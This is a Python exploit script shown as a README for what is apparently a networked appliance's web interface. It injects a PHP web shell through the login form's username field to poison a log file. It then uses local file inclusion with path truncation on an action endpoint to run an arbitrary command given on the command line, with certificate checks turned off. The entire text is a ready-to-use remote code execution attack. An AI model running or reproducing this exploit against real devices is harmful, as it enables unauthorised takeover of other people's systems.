README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import sys
import urllib3
urllib3.disable_warnings()
if len(sys.argv) < 3:
print("%s <host> <payload>" % sys.argv[0])
sys.exit(1)
host = sys.argv[1]
payload = sys.argv[2]
# Poison /tmp/messages
data = {
"login_auth": 0,
"miniHiveUI": 1,
"authselect": "Name/Password",
"userName": "<?php system($_POST['cmd']); exit(0);?>",
"password": "a"
}
requests.post('https://%s/login.php5' % host, data=data, verify=False)
# Trigger LFI through path truncation
data = {
"_page": "a" + "/.."*8 + "/"*4041 + "/tmp/messages",
"cmd": payload
}
reply = requests.post('https://%s/action.php5?_action=list&debug=true' % host, data=data, verify=False)
print(reply.text)